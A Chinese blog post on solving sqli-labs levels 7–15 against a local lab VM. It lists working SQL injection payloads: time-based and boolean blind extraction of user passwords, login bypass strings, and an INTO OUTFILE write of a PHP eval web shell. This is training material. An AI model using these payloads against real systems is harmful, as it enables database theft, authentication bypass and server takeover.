标签:from 总结 security 范围 ima data 延缓 sele 没有
北风卷地白草折,胡天八月即飞雪。今天温度可真低,脑子也清醒了不少,早上重新指定了计划后,紧张比较顺利。下面开始老黑的sqli-libs过关斩将的经历!!
Less 7:
分析:看显示的内容,猜测应该将注入的内容导出到文件中
TRY:
s1:测试闭合的条件,1‘ fail,1" fail,1‘) fail,1") fail,1‘)) OK!要问怎么测试是否闭合?方法很多,比方说下面的测试过程
s1.1 http://192.168.162.135/sqli-libs/Less-7?id=1‘)) order by 1--+ ,用来判断字段的数量,这里显示正常,接着
s1.1 url中的order by 一直增加到4的时候出错,证明表中有三个字段,而且注入的order by 4语句是OK有效的,所以也说明‘))可以闭合前面的内容。
s2:页面没有回显,所以可以使用时间注入法,简单说就是在构造的注入语句中添加if(expr1, expr2, expr3),expr2中加入sleep()延缓网页反应时间,expr1中写入对数据库信息猜测的语句,这样猜的对,网页反应慢,猜的错,立即反应,通过时间的长短,代表真假。
详细不多赘述,答案:http://192.168.162.135/sqli-libs/Less-7?id=1‘)) and if((ascii(substr((select group_concat(id,0x7c,username,0x7c,password) from security.users where id=10),4,4)))=97, sleep(5), null)--+
解释:97是a的ASCII值,if中判断第4个字符是不是a,当然一开始不会知道是什么,老黑用?代替字符,先结合二分法缩短范围,最终定位,
1. ? < 127 => ? < 64 => ? < 96 => ? < 112 => ? < 104 => ? < 100 => ? < 98 => ?=97
s3:但是老黑一开始说使用文件,是的,网上很多答案也是这样,我也是学了一下,实现过程如下:
s3.1:判断是否有写权限,可以判断有写权限
http://192.168.162.135/sqli-libs/Less-7?id=1‘)) and (select count(*)from mysql.user)>0 --+ //如果返回正常则有读写权限
s3.2:将注入内容写入文件
http://192.168.162.135/sqli-libs/Less-7?id=1‘)) union select 1,‘<?php eval($_POST["123"]); ?>‘,3 into outfile ‘/var/www/html/sqli-libs/test.php‘ --+
按理说,应该在系统的/var/www/html/sqli-libs下出现test.php文件,可惜的是,我的ubuntu下没有,可惜了,没有成功,不知道你们成功了吗?如果有人知道老黑哪写错了,还请指出,多谢,呵呵呵呵!
Less 8:
boolean猜表,id=1‘进行闭合
答案:http://192.168.162.135/sqli-libs/Less-8?id=1‘ and (ascii(substr((select group_concat(id,0x7c,username,0x7c,password) from security.users where id=10),4,4)))=97--+ boolean判断字符ascii,二分法速度快
Less 9:
时间长短猜表,id=1‘进行闭合
答案:http://192.168.162.135/sqli-libs/Less-9?id=1‘ and if((ascii(substr((select group_concat(id,0x7c,username,0x7c,password) from security.users where id=10),4,4)))=97, sleep(5), null)--+ 时间判断,页面反应时间长短代替boolean判断
Less 10:
和Less 9 一样
答案:http://192.168.162.135/sqli-libs/Less-10?id=1" and if((ascii(substr((select group_concat(id,0x7c,username,0x7c,password) from security.users where id=10),4,4)))=97, sleep(5), null)--+
Less 11:
和之前不同了,晒张图看看。
输入用户名和密码登陆系统,这也可以sql注入,同样是是寻找闭合方式,尝试了一下,得知 ‘ 便可以闭合
答案:
登陆:username=a && password=b‘ or ‘1‘=‘1
注入:1‘ union select 1,database()# : 1
Less 12:
答案:和Less 11相似
注入 :1‘ union select 1,database()# : 1
Less 13:
登陆: a : b‘) or 1=1
注入:a : b‘) or (ascii(substr((select group_concat(id,0x7c,username,0x7c,password) from security.users where id=10),4,4)))=97# (boolean 注入)
Less 14:
登陆: a : b" or 1=1#
注入:a : b" or (ascii(substr((select group_concat(id,0x7c,username,0x7c,password) from security.users where id=10),4,4)))=97# (boolean 注入)
Less 15:
登陆: a : b‘ or 1=1#
注入:a : b‘ or (ascii(substr((select group_concat(id,0x7c,username,0x7c,password) from security.users where id=10),4,4)))=97# (boolean 注入)
总结:基本上是先找闭合方式,然后寻找回显方式(直接:页面直接显示,错误信息显示,间接:boolean判断,时间判断),最后构造搜集想要的信息,OK!
【20171030早】sqli-libs Less7-15 练习
标签:from 总结 security 范围 ima data 延缓 sele 没有
原文地址:http://www.cnblogs.com/heijuelou/p/7753738.html